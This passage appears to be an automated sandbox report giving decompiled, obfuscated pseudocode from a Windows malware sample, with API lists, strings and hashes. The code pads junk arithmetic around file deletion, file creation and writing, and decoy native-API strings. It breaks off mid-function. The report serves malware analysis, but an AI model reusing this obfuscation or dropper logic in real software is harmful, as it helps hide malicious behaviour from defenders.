                                                				signed int _t280;
                                                				signed int _t284;
                                                				signed int _t286;
                                                				signed int _t287;
                                                				signed int _t290;
                                                				signed int _t292;
                                                				signed int _t293;
                                                				signed int _t294;
                                                				signed int _t308;
                                                				signed int _t310;
                                                				signed int _t311;
                                                				signed int _t316;
                                                				signed int _t321;
                                                				signed int _t326;
                                                				signed int _t343;
                                                				intOrPtr _t345;
                                                				intOrPtr _t346;
                                                				intOrPtr _t351;
                                                				void* _t356;
                                                				void* _t357;
                                                				intOrPtr _t358;
                                                				void* _t361;
                                                				signed int _t362;
                                                				void* _t368;
                                                				void* _t377;
                                                				void* _t379;
                                                				void* _t381;
                                                				void* _t387;
                                                
                                                				_t322 = __ebx;
                                                				_t356 = _t357;
                                                				_t358 = _t357 + 0xffffffa4;
                                                				_push(__ebx);
                                                				_v16 = 0;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				_push(_t356);
                                                				_push(0x4f3e6b);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t358;
                                                				_v60 = 0;
                                                				do {
                                                					E00407678(_v16, 0, 1,  &_v16);
                                                					_v60 = _v60 + 1;
                                                				} while (_v60 != 7);
                                                				_t150 =  *0x4fef18; // 0xbc3e19a
                                                				E004FEED0 = _t150;
                                                				_t151 =  *0x4feed8; // 0x1cb9338e
                                                				 *0x4feed8 = E0040489C(_t151);
                                                				_t153 =  *0x4feee8; // 0xdcd0f434
                                                				 *0x4feedc = _t153;
                                                				_t154 =  *0x4feedc; // 0xbc3e19a
                                                				_t361 = _t154 -  *0x4feed8; // 0x1cb9338e
                                                				if(_t361 > 0) {
                                                					_v28 = _v56 + _v40;
                                                					_t321 = _v36 + _v52;
                                                					_t362 = _t321;
                                                					_v32 = _t321;
                                                				}
                                                				asm("fild dword [ebp-0x28]");
                                                				_v48 = E004048D8();
                                                				_t156 =  *0x4feee0; // 0x747938b
                                                				 *0x4fef14 = _t156;
                                                				_t157 =  *0x4feed4; // 0x0
                                                				E00407640(_t157, L"KiFastSystemCall");
                                                				if(_t362 == 0) {
                                                					_t316 =  *0x4fef28; // 0x3c79b5d4
                                                					 *0x4fef3c = _t316 * E004FEF2C;
                                                				}
                                                				_push(_t356);
                                                				_push(0x4f3cd8);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t358;
                                                				_v28 = _v44 << 4;
                                                				_v40 = 0;
                                                				do {
                                                					_v32 = 0xa8 - _v60;
                                                					 *0x4fef28 =  *0x4feee8 * 0xa5;
                                                					_v68 = _v16;
                                                					if(_v68 != 0) {
                                                						_v68 =  *((intOrPtr*)(_v68 - 4));
                                                					}
                                                					if(_v68 > 0x89) {
                                                						_t308 =  *0x4fef3c; // 0x1cb932a9
                                                						_t368 = _t308 + 0x78 -  *0x4feefc; // 0x4b08dcc7
                                                						if(_t368 >= 0) {
                                                							_t310 =  *0x4feedc; // 0xbc3e19a
                                                							 *0x4feee0 = _t310;
                                                						} else {
                                                							_t311 =  *0x4fef40; // 0x3c79b5d4
                                                							E004FEED0 = _t311 - 0x3a;
                                                						}
                                                					}
                                                					_v40 = _v40 + 1;
                                                				} while (_v40 != 0xa);
                                                				_t167 =  *0x4feef0; // 0x44632301
                                                				 *0x4fef14 = _t167 + E004FEF0C;
                                                				asm("fild dword [0x4feeec]");
                                                				E004FEF34 = E004048D8();
                                                				_t170 =  *0x4feee8; // 0xdcd0f434
                                                				 *0x4fef48 = _t170 *  *0x4fef18;
                                                				E00407678(_v16, 0, 1,  &_v16);
                                                				_v72 = _v8;
                                                				if(_v72 != 0) {
                                                					_v72 =  *(_v72 - 4) >> 1;
                                                				}
                                                				E0040728C(_v12, _v72 + _v72);
                                                				_t178 =  *0x4feef4; // 0xb52124ca
                                                				 *0x4feef4 = E0040489C(_t178);
                                                				_t180 =  *0x4fef40; // 0x3c79b5d4
                                                				 *0x4feefc = _t180;
                                                				_v36 = _v48 * _v52;
                                                				_t183 =  *0x4feedc; // 0xbc3e19a
                                                				E004FEF10 = _t183;
                                                				_t184 =  *0x4fef14; // 0xb52124ca
                                                				 *0x4fef14 = E0040489C(_t184);
                                                				_v40 = _v60;
                                                				_v76 =  *_v12;
                                                				if(_v76 != 0) {
                                                					_v76 =  *(_v76 - 4) >> 1;
                                                				}
                                                				_t193 = E004070B4( *_v12);
                                                				_t196 = GetShortPathNameW(E004070B4(_v8), _t193, _v76 + _v76); // executed
                                                				_v64 = _t196;
                                                				_v80 =  *_v12;
                                                				if(_v80 != 0) {
                                                					_v80 =  *(_v80 - 4) >> 1;
                                                				}
                                                				if(_v64 <= _v80) {
                                                					L43:
                                                					_t200 =  *0x4fef40; // 0x3c79b5d4
                                                					E004FEED0 = _t200;
                                                					_t201 = E004FEF2C; // 0xa1d900
                                                					 *0x4feef0 = _t201;
                                                					_t202 = E004FEED0; // 0xc3c34ef0
                                                					_t387 = _t202 -  *0x4feef0; // 0x44632301
                                                					if(_t387 > 0) {
                                                						_t231 =  *0x4feedc; // 0xbc3e19a
                                                						E004FEF00 = _t231;
                                                					}
                                                					_v36 = 0;
                                                					if(_v36 >= 0xc) {
                                                						L47:
                                                						_t204 =  *0x4feeec; // 0xb52124f2
                                                						E004FEF34 = _t204;
                                                						_v24 = _v20 + _v20 + (_v20 + _v20) * 8;
                                                						_t208 =  *0x4fef18; // 0xbc3e19a
                                                						 *0x4feecc = _t208 * E004FEED0;
                                                						E0040728C(_v12, _v64);
                                                						_v36 = _v40 - 0x4a;
                                                						_push(_v52);
                                                						_t326 =  *0x4feefc; // 0x4b08dcc7
                                                						_t343 =  *0x4feee0; // 0x747938b
                                                						_v56 = E004EE798(_v20, _t322, _t326, _t343, _t389);
                                                						_t217 =  *0x4fef40; // 0x3c79b5d4
                                                						 *0x4fef18 = _t217;
                                                						_v44 = 0xab - _v48;
                                                						_v60 = (_v32 << 4) + _v32;
                                                						_t223 =  *0x4fef28; // 0x3c79b5d4
                                                						E004FEF38 = _t223;
                                                						_pop(_t345);
                                                						 *[fs:eax] = _t345;
                                                						_pop(_t346);
                                                						 *[fs:eax] = _t346;
                                                						_push(E004F3E72);
                                                						return E004069A8( &_v16);
                                                					} else {
                                                						do {
                                                							_v36 = _v36 + 1;
                                                							_t228 =  *0x4feed8; // 0x1cb9338e
                                                							 *0x4fef18 = _t228;
                                                							_v44 = _v60 + 0x88;
                                                							_t389 = _v36 - 0xc;
                                                						} while (_v36 < 0xc);
                                                						goto L47;
                                                					}
                                                				} else {
                                                					E0040728C(_v12, _v64);
                                                					_v28 = _v44 - 0x84;
                                                					_t236 = E004FEF34; // 0xc3c34ef0
                                                					 *0x4feef0 = _t236;
                                                					_t237 =  *0x4fef18; // 0xbc3e19a
                                                					 *0x4feef4 = _t237;
                                                					_t238 =  *0x4feef0; // 0x44632301
                                                					_t377 = _t238 -  *0x4feef4; // 0xb52124ca
                                                					if(_t377 <= 0) {
                                                						_v84 = _v16;
                                                						__eflags = _v84;
                                                						if(_v84 != 0) {
                                                							_t276 = _v84 - 4;
                                                							__eflags = _t276;
                                                							_v84 =  *_t276;
                                                						}
                                                						__eflags = _v84 - 0x5a;
                                                						if(_v84 == 0x5a) {
                                                							_t274 = E004FEF34; // 0xc3c34ef0
                                                							E004FEED0 = _t274;
                                                						}
                                                						L37:
                                                						_t240 =  *0x4fef44; // 0x38993
                                                						 *0x4fef04 = _t240 - 3;
                                                						E00407678(_v16, 0, 1,  &_v16);
                                                						_t245 =  *0x4feefc; // 0x4b08dcc7
                                                						E004FEF10 = _t245;
                                                						_t246 =  *0x4feee0; // 0x747938b
                                                						 *0x4fef14 = _t246;
                                                						_v88 =  *_v12;
                                                						if(_v88 != 0) {
                                                							_v88 =  *(_v88 - 4) >> 1;
                                                						}
                                                						_t253 = E004070B4( *_v12);
                                                						_v64 = GetShortPathNameW(E004070B4(_v8), _t253, _v88 + _v88);
                                                						_t257 =  *0x4fef28; // 0x3c79b5d4
                                                						 *0x4feea0 = _t257;
                                                						_t258 = E004FEED0; // 0xc3c34ef0
                                                						if(_t258 -  *0x4fef18 >= 0x37) {
                                                							_t260 =  *0x4feed8; // 0x1cb9338e
                                                							 *0x4feef0 = _t260;
                                                						} else {
                                                							_v24 = _v60 + 4;
                                                						}
                                                						_t261 = E004FEF20; // 0x6e687a1a
                                                						E004FEF00 = _t261;
                                                						_v36 = _v32 * _v44;
                                                						_v40 = _v56 + 4;
                                                						E00406CF4( &_v16, L"vds.exe");
                                                						goto L43;
                                                					}
                                                					_t278 =  *0x4feecc; // 0xd26bafe0
                                                					 *0x4fef04 = _t278;
                                                					_v40 = _v56 * 0x88;
                                                					_t280 =  *0x4feefc; // 0x4b08dcc7
                                                					 *0x4fef18 = _t280;
                                                					_t351 =  *0x4feed4; // 0x0
                                                					if(E00407774(L"NtAlpcCreateSectionView", 1, _t351) >= 0x18) {
                                                						asm("fild dword [0x4fef28]");
                                                						E004FEF34 = E004048CC();
                                                						goto L37;
                                                					}
                                                					_t284 =  *0x4feea0; // 0xa1d900
                                                					_t379 = _t284 +  *0x4fef30 -  *0x4fef30; // 0xa1d816
                                                					if(_t379 != 0) {
                                                						_t286 =  *0x4fef30; // 0xa1d816
                                                						E004FEF50 = _t286;
                                                						_t287 =  *0x4feef0; // 0x44632301
                                                						__eflags = _t287 - E004FEF50; // 0xa3b3f6c0
                                                						if(__eflags > 0) {
                                                							 *0x4feeec =  *0x4feee0 * 0x42;
                                                						}
                                                						goto L37;
                                                					}
                                                					_v52 = 0;
                                                					if(_v52 >= 0) {
                                                						goto L37;
                                                					} else {
                                                						goto L25;
                                                					}
                                                					do {
                                                						L25:
                                                						_v52 = _v52 + 1;
                                                						_t290 = E004FEF50; // 0xa3b3f6c0
                                                						E004FEF50 = E0040489C(_t290);
                                                						_t292 =  *0x4feef0; // 0x44632301
                                                						_t381 = _t292 - E004FEF50; // 0xa3b3f6c0
                                                						if(_t381 <= 0) {
                                                							_t293 = E004FEF34; // 0xc3c34ef0
                                                							_t294 = _t293 * E004FEF20;
                                                							__eflags = _t294;
                                                							E004FEF20 = _t294;
                                                						} else {
                                                							_v36 = _v60;
                                                						}
                                                					} while (_v52 < 0);
                                                					goto L37;
                                                				}
                                                 			}

                                                APIs
                                                • GetShortPathNameW.KERNELBASE(00000000,00000000,00000000), ref: 004F39C6
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 004F3B96
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                 • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: NamePathShort
                                                • String ID: KiFastSystemCall$NtAlpcCreateSectionView$Z$vds.exe
                                                • API String ID: 1295925010-1335456658
                                                • Opcode ID: 0675a406a4cf5b87f9525846a48f7486e4043924d0f24a33e6f868989c0d26e2
                                                • Instruction ID: 8a09a906922efe0bca48947be6874107c18c1cad1ac228bec230e4db3fa71def
                                                • Opcode Fuzzy Hash: 0675a406a4cf5b87f9525846a48f7486e4043924d0f24a33e6f868989c0d26e2
                                                • Instruction Fuzzy Hash: 2C02C375A10248DFDB00DFAAE980AADBBF1FB08306B10453AE505E7371D775A951CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E004F684C(char __eax, void* __ebx, long __ecx, void* __edx, void* __eflags) {
                                                				char _v8;
                                                				void* _v12;
                                                				long _v16;
                                                				char _v17;
                                                				char _v24;
                                                				char _v28;
                                                				char _v32;
                                                				intOrPtr _v36;
                                                				signed int _v40;
                                                				intOrPtr _v44;
                                                				char _v48;
                                                				void* _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				char _v68;
                                                				char _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				intOrPtr _v88;
                                                				intOrPtr _v92;
                                                				signed int _v96;
                                                				void* _v100;
                                                				long _v104;
                                                				intOrPtr _v108;
                                                				char _v112;
                                                				intOrPtr _v116;
                                                				intOrPtr _t155;
                                                				intOrPtr _t157;
                                                				signed int _t174;
                                                				void* _t179;
                                                				signed int _t183;
                                                				intOrPtr _t184;
                                                				signed int _t186;
                                                				intOrPtr _t187;
                                                				intOrPtr _t192;
                                                				intOrPtr _t194;
                                                				intOrPtr _t197;
                                                				signed int _t200;
                                                				intOrPtr _t210;
                                                				signed int _t211;
                                                				intOrPtr _t217;
                                                				int _t228;
                                                				intOrPtr _t236;
                                                				intOrPtr _t249;
                                                				signed int _t255;
                                                				signed int _t256;
                                                				intOrPtr _t263;
                                                				signed int _t268;
                                                				signed int _t273;
                                                				char _t278;
                                                				intOrPtr _t279;
                                                				intOrPtr _t280;
                                                				signed int _t287;
                                                				signed int _t288;
                                                				signed int _t289;
                                                				intOrPtr _t303;
                                                				signed int _t304;
                                                				signed int _t311;
                                                				intOrPtr _t312;
                                                				intOrPtr _t316;
                                                				void* _t326;
                                                				void* _t334;
                                                				intOrPtr _t342;
                                                				void* _t344;
                                                				void* _t345;
                                                
                                                				_push(__ebx);
                                                				_v112 = 0;
                                                				_v24 = 0;
                                                				_v28 = 0;
                                                				_v32 = 0;
                                                				_v16 = __ecx;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				E00406AAC( &_v8);
                                                				_push(_t326);
                                                				_push(0x4f6d12);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t326 + 0xffffff90;
                                                				_v48 = _v56 - _v64;
                                                				_t155 =  *0x4feeec; // 0xb52124f2
                                                				 *0x4feeec = E0040489C(_t155);
                                                				_t157 =  *0x4fef3c; // 0x1cb932a9
                                                				 *0x4feef0 = _t157;
                                                				asm("fild dword [ebp-0x54]");
                                                				_v76 = E004048D8();
                                                				_v60 = _v92 - 0xc8;
                                                				_v96 = _v40 * 0x91;
                                                				_v17 = 0;
                                                				E00407400( &_v112, _v8);
                                                				if(E00414964(_v112, 1) != 0) {
                                                					_t255 = E004FEF34; // 0xc3c34ef0
                                                					 *0x4feecc = _t255;
                                                					_t256 = E004FEED0; // 0xc3c34ef0
                                                					E004FEED0 = E0040489C(_t256);
                                                					asm("fild dword [ebp-0x38]");
                                                					_v40 = E004048CC();
                                                					_v44 = 0xb1 - _v36;
                                                					_v68 = _v76 + 0x39;
                                                					_t263 =  *0x4fee98; // 0x0
                                                					_v108 = _t263;
                                                					if(_v108 != 0) {
                                                						_v108 =  *((intOrPtr*)(_v108 - 4));
                                                					}
                                                					if(_v108 > 0xcf) {
                                                						asm("fild dword [ebp-0x54]");
                                                						_v80 = E004048CC();
                                                					}
                                                					DeleteFileW(E004070B4(_v8));
                                                					_v88 = 0;
                                                					while(_v88 < 7) {
                                                						_v88 = _v88 + 1;
                                                						_t287 =  *0x4fef3c; // 0x1cb932a9
                                                						E004FEF50 = _t287;
                                                						_t288 =  *0x4fef28; // 0x3c79b5d4
                                                						E004FEF50 = _t288;
                                                						_t289 = E004FEF50; // 0xa3b3f6c0
                                                						_t334 = _t289 - E004FEF50; // 0xa3b3f6c0
                                                						if(_t334 > 0) {
                                                							_v40 = _v96 - _v56;
                                                						}
                                                					}
                                                					_t268 = E004FEF34; // 0xc3c34ef0
                                                					 *0x4feef4 = _t268;
                                                					E00406CF4( &_v28, L"GetNamedPipeClientSessionId");
                                                					if(_v60 - _v48 <= _v80 - _v48) {
                                                						_t273 = E004FEF2C; // 0xa1d900
                                                						E004FEF2C = E0040489C(_t273);
                                                					} else {
                                                						_v64 = _v92 - 0x87;
                                                					}
                                                					if(0x8c -  *0x4feedc >= 8) {
                                                						_t278 = _v76 + _v80;
                                                						__eflags = _t278;
                                                						_v52 = _t278;
                                                					} else {
                                                						_v48 = 0;
                                                						if(_v48 < 0xd) {
                                                							_v48 = _v48 + 1;
                                                							_v68 = 0;
                                                							do {
                                                								E00406CF4( &_v24, _v32);
                                                								_v68 = _v68 + 1;
                                                							} while (_v68 != 4);
                                                						}
                                                					}
                                                					_t279 =  *0x4fef18; // 0xbc3e19a
                                                					_t280 = _t279 - 0xac;
                                                					_t342 = _t280;
                                                					 *0x4fef40 = _t280;
                                                				}
                                                				E004F5234(_v80, _v36, _v68, _t342);
                                                				E00406CF4( &_v24, _v28);
                                                				_v52 = _v48 - 0x41;
                                                				_v56 = _v88 - _v72;
                                                				_t174 = E004FEF10; // 0x1cb931c0
                                                				 *0x4fef04 = _t174;
                                                				_v64 = _v80 + 4;
                                                				_t179 = CreateFileW(E004070B4(_v8), 0xc0000000, 3, 0, 1, 0x80, 0); // executed
                                                				_v100 = _t179;
                                                				_v92 = 0;
                                                				do {
                                                					_t311 = E004FEF50; // 0xa3b3f6c0
                                                					E004F5234(_v52, _v72, _t311, 0);
                                                					_t183 =  *0x4feee8; // 0xdcd0f434
                                                					E004FEF00 = _t183;
                                                					_t184 =  *0x4fef04; // 0x43c14963
                                                					 *0x4fef04 = E0040489C(_t184);
                                                					_t186 = E004FEF00; // 0xa3b3f6c0
                                                					_t344 = _t186 -  *0x4fef04; // 0x43c14963
                                                					if(_t344 <= 0) {
                                                						_t187 =  *0x4fef30; // 0xa1d816
                                                						__eflags = _t187 +  *0x4feeec -  *0x4feeec; // 0xb52124f2
                                                						if(__eflags > 0) {
                                                							__eflags = _v84 + 0x39 - _v36;
                                                							if(_v84 + 0x39 >= _v36) {
                                                								_t249 = _v36 + 0x6a;
                                                								__eflags = _t249;
                                                								_v116 = _t249;
                                                								asm("fild dword [ebp-0x70]");
                                                								_v60 = E004048CC();
                                                							} else {
                                                								_v56 = 0;
                                                								__eflags = _v56 - 0xa;
                                                								while(__eflags < 0) {
                                                									_v56 = _v56 + 1;
                                                									 *0x4fef14 = E004F0EBC(0x4fef4c, 0x4fef4c, __eflags);
                                                									__eflags = _v56 - 0xa;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_v68 = _v48;
                                                					}
                                                					_v116 = _v76 + 0xa2;
                                                					asm("fild dword [ebp-0x70]");
                                                					_v80 = E004048CC();
                                                					_t192 =  *0x4feed8; // 0x1cb9338e
                                                					_t345 = _t192 + 0xf8 -  *0x4fef44; // 0x38993
                                                					if(_t345 < 0) {
                                                						_push( &_v52);
                                                						_push( &_v96);
                                                						_push( &_v72);
                                                						 *0x4fef40 = E004F4700(0x4feef0, 0,  &_v68, 0x4fef44, _t345);
                                                					}
                                                					_v92 = _v92 + 1;
                                                				} while (_v92 != 0xd);
                                                				_t194 =  *0x4fef04; // 0x43c14963
                                                				 *0x4fef04 = E0040489C(_t194);
                                                				asm("fild dword [0x4feedc]");
                                                				E004FEF20 = E004048CC();
                                                				_t197 =  *0x4fef4c; // 0x43c1493c
                                                				 *0x4fef40 = _t197 + 0x50;
                                                				 *0x4feea0 =  *0x4fef48 * 0xb4;
                                                				_t200 = E004FEF34; // 0xc3c34ef0
                                                				 *0x4feeec = _t200 -  *0x4fef48;
                                                				if(_v100 != 0xffffffff) {
                                                					_v84 = 0;
                                                					while(_v84 < 0xa) {
                                                						_v84 = _v84 + 1;
                                                						_v92 = 0;
                                                						do {
                                                							_t236 =  *0x4fef24; // 0x0
                                                							_t316 =  *0x4feee4; // 0x0
                                                							E00407640(_t236, _t316);
                                                							if(0 != 0) {
                                                								_v52 = _v96;
                                                							} else {
                                                								E00406CF4( &_v24, L"NdrProxyForwardingFunction4");
                                                							}
                                                							_v92 = _v92 + 1;
                                                						} while (_v92 != 0x10);
                                                						_t351 = _v84 - 0xa;
                                                					}
                                                					_t210 =  *0x4fef04; // 0x43c14963
                                                					_push(_t210);
                                                					_t211 =  *0x4feea0; // 0xa1d900
                                                					_push(_t211);
                                                					_push(_v88);
                                                					_t303 =  *0x4fef28; // 0x3c79b5d4
                                                					E004F5954(_v60, 0, _t303, _v96, _t351);
                                                					_push(_v92);
                                                					_push(_v80);
                                                					_t217 =  *0x4fef4c; // 0x43c1493c
                                                					_push(_t217);
                                                					_t304 = E004FEF00; // 0xa3b3f6c0
                                                					 *0x4fef30 = E004F5954(_v76, 0, _t304, _v76, _t351);
                                                					_v80 = 0;
                                                					while(_v80 < 8) {
                                                						_v80 = _v80 + 1;
                                                						_v88 = 0;
                                                						while(_v88 < 0xe) {
                                                							_v88 = _v88 + 1;
                                                						}
                                                					}
                                                					_v64 = _v76 - _v44;
                                                					_v60 = 0;
                                                					while(_v60 < 6) {
                                                						_v60 = _v60 + 1;
                                                						_v72 = _v36 + 4;
                                                					}
                                                					_t228 = WriteFile(_v100, _v12, _v16,  &_v104, 0); // executed
                                                					asm("sbb eax, eax");
                                                					_v17 = _t228 + 1;
                                                					FindCloseChangeNotification(_v100); // executed
                                                				}
                                                				_pop(_t312);
                                                				 *[fs:eax] = _t312;
                                                				_push(E004F6D19);
                                                				E004069A8( &_v112);
                                                				E00406A08( &_v32, 3);
                                                				return E004069F0( &_v8);
                                                			}

                                                APIs
                                                  • Part of subcall function 00406AAC: SysAllocStringLen.OLEAUT32(004F9861,54EB1089), ref: 00406ABA
                                                  • Part of subcall function 00414964: GetFileAttributesW.KERNEL32(00000000,?,?,00000000,004F68DB,00000000,004F6D12), ref: 00414975
                                                • DeleteFileW.KERNEL32(00000000,00000000,004F6D12), ref: 004F6951
                                                • CreateFileW.KERNELBASE(00000000,C0000000,00000003,00000000,00000001,00000080,00000000,00000000,004F6D12), ref: 004F6A8A
                                                Strings
                                                • NdrProxyForwardingFunction4, xrefs: 004F6C08
                                                • GetNamedPipeClientSessionId, xrefs: 004F69A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: File$AllocAttributesCreateDeleteString
                                                • String ID: GetNamedPipeClientSessionId$NdrProxyForwardingFunction4
                                                • API String ID: 884470057-2457481811
                                                • Opcode ID: c321f479e29d5d881d0874c9e3ef6ce8a45d4fb24531ad4a078b8a4ea2aa142b
                                                • Instruction ID: b04cf053d614f00921ad11d5840789a9434d6e558864355ebcc84eb55fc39168
                                                • Opcode Fuzzy Hash: c321f479e29d5d881d0874c9e3ef6ce8a45d4fb24531ad4a078b8a4ea2aa142b
                                                • Instruction Fuzzy Hash: 5EF1E2B0D00248DFCB00DFAAE985AADBBF5FB08305F11853AE605E7265D738A955CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00414964(void* __eax, void* __edx) {
                                                				signed char _t14;
                                                				void* _t21;
                                                				void* _t28;
                                                				long _t29;
                                                				WCHAR* _t32;
                                                				void* _t33;
                                                
                                                				_t28 = __edx;
                                                				_t33 = __eax;
                                                				_t32 = E00407330(__eax);
                                                				_t14 = GetFileAttributesW(_t32); // executed
                                                				if(_t14 == 0xffffffff) {
                                                					_t29 = GetLastError();
                                                					if(_t29 == 2 || _t29 == 3 || _t29 == 0x7b || E00414924(_t33) == 0) {
                                                						return 0;
                                                					} else {
                                                						return 1;
                                                					}
                                                				}
                                                				if((_t14 & 0x00000004) == 0) {
                                                					return _t14 & 0xffffff00 | (_t14 & 0x00000010) == 0x00000000;
                                                				}
                                                				if(_t28 != 0) {
                                                					if((_t14 & 0x00000010) == 0) {
                                                						_t21 = CreateFileW(_t32, 0x80000000, 1, 0, 3, 0, 0);
                                                						if(_t21 == 0xffffffff) {
                                                							return GetLastError() & 0xffffff00 | _t22 == 0x00000020;
                                                						}
                                                						CloseHandle(_t21);
                                                						return 1;
                                                					}
                                                					return 0;
                                                				}
                                                				return 1;
                                                			}

                                                APIs
                                                • GetFileAttributesW.KERNEL32(00000000,?,?,00000000,004F68DB,00000000,004F6D12), ref: 00414975
                                                • GetLastError.KERNEL32(00000000,?,?,00000000,004F68DB,00000000,004F6D12), ref: 004149CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: AttributesErrorFileLast
                                                • String ID:
                                                • API String ID: 1799206407-0
                                                • Opcode ID: 229930fbf8ebe544eeadf5f9bbc2de16a83e9f774fc1dc3c6833d551b3d58c8d
                                                • Instruction ID: 25158c1bd2398d777e934e9cff4b07ce8652424a53ff7617a99fafd84f24faa1
                                                • Opcode Fuzzy Hash: 229930fbf8ebe544eeadf5f9bbc2de16a83e9f774fc1dc3c6833d551b3d58c8d
                                                • Instruction Fuzzy Hash: 62011AB527424025E935207D4C867FB06498BCA7A8F280627FA61A62D2D66E49C361BE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E004F4258(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                				intOrPtr* _v8;
                                                				char _v12;
                                                				char _v16;
                                                				char _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				intOrPtr _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v80;
                                                				intOrPtr _v84;
                                                				intOrPtr _v88;
                                                				signed int _v92;
                                                				intOrPtr _v96;
                                                				intOrPtr _v100;
                                                				intOrPtr _v104;
                                                				intOrPtr _v108;
                                                				intOrPtr _v112;
                                                				intOrPtr _v116;
                                                				intOrPtr _v120;
                                                				short _v640;
                                                				intOrPtr _v644;
                                                				char _v648;
                                                				signed int _t159;
                                                				signed int _t161;
                                                				intOrPtr _t162;
                                                				signed int _t181;
                                                				signed int _t190;
                                                				intOrPtr _t193;
                                                				intOrPtr _t194;
                                                				signed int _t197;
                                                				signed int _t204;
                                                				signed int _t212;
                                                				intOrPtr _t218;
                                                				intOrPtr _t222;
                                                				intOrPtr _t223;
                                                				signed int _t229;
                                                				signed int _t230;
                                                				signed int _t232;
                                                				intOrPtr _t234;
                                                				signed int _t235;
                                                				intOrPtr _t257;
                                                				intOrPtr _t259;
                                                				signed int _t261;
                                                				signed int _t262;
                                                				intOrPtr _t278;
                                                				intOrPtr _t279;
                                                				intOrPtr _t287;
                                                				void* _t291;
                                                				void* _t292;
                                                				intOrPtr _t293;
                                                				void* _t295;
                                                				void* _t308;
                                                				void* _t309;
                                                				void* _t313;
                                                				void* _t316;
                                                				void* _t322;
                                                
                                                				_t289 = __esi;
                                                				_t288 = __edi;
                                                				_t267 = __ebx;
                                                				_t291 = _t292;
                                                				_t293 = _t292 + 0xfffffd7c;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_v648 = 0;
                                                				_v12 = 0;
                                                				_v16 = 0;
                                                				_v20 = 0;
                                                				_v24 = 0;
                                                				_v8 = __eax;
                                                				_push(_t291);
                                                				_push(0x4f46b4);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t293;
                                                				_push(_t291);
                                                				_push(0x4f4684);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t293;
                                                				_v76 = _v96 + 0xa3;
                                                				_v84 = _v68 + _v92;
                                                				_v108 = _v88 - _v44;
                                                				_v100 = 0;
                                                				while(_v100 < 7) {
                                                					_v100 = _v100 + 1;
                                                					_t259 =  *0x4fef4c; // 0x43c1493c
                                                					 *0x4fef4c = E0040489C(_t259);
                                                					_t261 = E004FEF20; // 0x6e687a1a
                                                					E004FEF50 = _t261;
                                                					_t262 = E004FEF50; // 0xa3b3f6c0
                                                					_t295 = _t262 -  *0x4fef4c; // 0x43c1493c
                                                					if(_t295 > 0) {
                                                						_v36 = _v104 - _v72;
                                                					}
                                                					_v52 = 0;
                                                					do {
                                                						asm("fild dword [ebp-0x6c]");
                                                						_v60 = E004048CC();
                                                						_v52 = _v52 + 1;
                                                					} while (_v52 != 0xf);
                                                				}
                                                				_v28 = 0;
                                                				if(_v28 < 0xb) {
                                                					_v28 = _v28 + 1;
                                                					if(_v96 <= _v56) {
                                                						 *0x4fef14 = 0x5c -  *0x4feeec;
                                                					} else {
                                                						_v48 = 0;
                                                						while(_v48 < 0xd) {
                                                							_v48 = _v48 + 1;
                                                							_t257 =  *0x4feecc; // 0xd26bafe0
                                                							 *0x4feecc = E0040489C(_t257);
                                                						}
                                                					}
                                                				}
                                                				 *0x4feea0 = E004FEF2C * 0x57;
                                                				E00406B60(_v8, GetWindowsDirectoryW( &_v640, 0x104),  &_v640);
                                                				_t159 =  *0x4feed8; // 0x1cb9338e
                                                				E004FEF0C = _t159;
                                                				_v72 = 0;
                                                				while(_v72 < 0xf) {
                                                					_v72 = _v72 + 1;
                                                					_v80 = _v64 - 0xea;
                                                					_v644 = _v108 + 0xf1;
                                                					asm("fild dword [ebp-0x280]");
                                                					_v88 = E004048CC();
                                                					_v96 = _v40;
                                                					_v644 = _v100 + 4;
                                                					asm("fild dword [ebp-0x280]");
                                                					_v92 = E004048D8();
                                                				}
                                                				_t161 = E004FEF34; // 0xc3c34ef0
                                                				E004FEED0 = _t161;
                                                				_t162 =  *0x4fef18; // 0xbc3e19a
                                                				 *0x4feed8 = _t162;
                                                				_v60 = _v28 - 0x52;
                                                				asm("fild dword [ebp-0x6c]");
                                                				_v32 = E004048CC();
                                                				E00407284( *_v8, 0);
                                                				if(0 != 0) {
